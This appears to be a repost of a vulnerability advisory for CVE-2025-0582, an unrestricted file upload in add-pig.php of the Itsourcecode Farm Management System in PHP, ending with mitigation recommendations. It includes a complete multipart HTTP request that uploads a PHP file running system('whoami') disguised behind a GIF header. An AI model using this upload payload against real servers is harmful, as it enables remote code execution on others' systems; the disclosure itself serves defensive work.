CVE-2025-0582

Itsourcecode Farm Management System In PHP v1.0 add-pig.php Unrestricted Upload

NAME OF AFFECTED PRODUCT(S)

  • Farm Management System In PHP

AFFECTED AND/OR FIXED VERSION(S)

submitter

  • zzz,xiongbaojiang

Vulnerable File

  • add-pig.php

VERSION(S)

  • V1.0

PROBLEM TYPE

Vulnerability Type

  • Unrestricted Upload

Root Cause

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Vulnerability Path

In the add-pig.php file of the "Farm Management System In PHP" project, attackers can upload malicious code files through the parameter $res1_name. Due to the lack of proper validation and sanitation of the uploaded files, attackers are able to directly upload malicious files to the server, leading to the risk of arbitrary code execution.

Key Parameter:

  • Parameter : $res1_name

  • File Name : farm management system/add-pig.php

  • Line Number: 37

    复制代码
    $res1_name = basename($_FILES['pigphoto']['name']);

File Upload:

  • Trigger Path: Arbitrary File Upload/Write

  • File Name : farm management system/add-pig.php

  • Line Number: 45

    move = move_uploaded_file(tmp_name, location.res1_name);

Vulnerability POC

复制代码
POST /farm123/add-pig.php HTTP/1.1
Host: farm
Content-Type: multipart/form-data; boundary=---------------------------85676068117477891701865867569
Content-Length: 1468

-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigno"

pig-fms-2793
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="weight"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="arrived"

2024-12-17
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="gender"

male
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="status"

active
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="breed"

23
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="remark"

1
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="submit"


-----------------------------85676068117477891701865867569--

Payload:

复制代码
-----------------------------85676068117477891701865867569
Content-Disposition: form-data; name="pigphoto"; filename="test.php"
Content-Type: application/octet-stream

GIF89a;

<?php 
system('whoami');
?>

The following are screenshots of some specific information obtained from testing and running with the yakit tool:


复制代码
/uploadfolder/test.php

Recommendations for Vulnerability Mitigation

  1. File Type Validation: Limit the allowed file types (e.g., only allow image formats) before processing uploads.
  2. File Name Sanitization: Clean and rename uploaded files to avoid using user-provided names directly.
  3. Use Temporary Directory: Store uploaded files in a temporary directory and conduct security checks after processing.
  4. Permission Control: Ensure correct permission settings on the upload directory to prevent direct execution of uploaded files.
  5. Input Validation: Rigorously validate all user inputs to ensure security.
相关推荐
Never_z&y7 小时前
纵深防御——文件上传漏洞
web安全
K_i1349 小时前
HTTP与HTTPS:从明文到加密的Web安全革命
web安全·http·https
huluang12 小时前
网络安全等级测评师能力评估样卷及答案
安全·web安全
独行soc13 小时前
2025年渗透测试面试题总结-105(题目+回答)
网络·python·安全·web安全·adb·渗透测试·安全狮
lubiii_1 天前
SQLMap常用命令指南(参数及其用法)
sql·web安全·网络安全
风语者日志2 天前
CTF攻防世界WEB精选基础入门:command_execution
web安全·网络安全·ctf·小白入门
witkey_ak98962 天前
网安面试题收集(2)
web安全
white-persist2 天前
XXE 注入漏洞全解析:从原理到实战
开发语言·前端·网络·安全·web安全·网络安全·信息可视化
骥龙2 天前
1.2、网络安全攻防实验室搭建指南:VMware + Kali Linux + Win10 全流程
linux·安全·web安全
谈不譚网安3 天前
Raven2
web安全·网络安全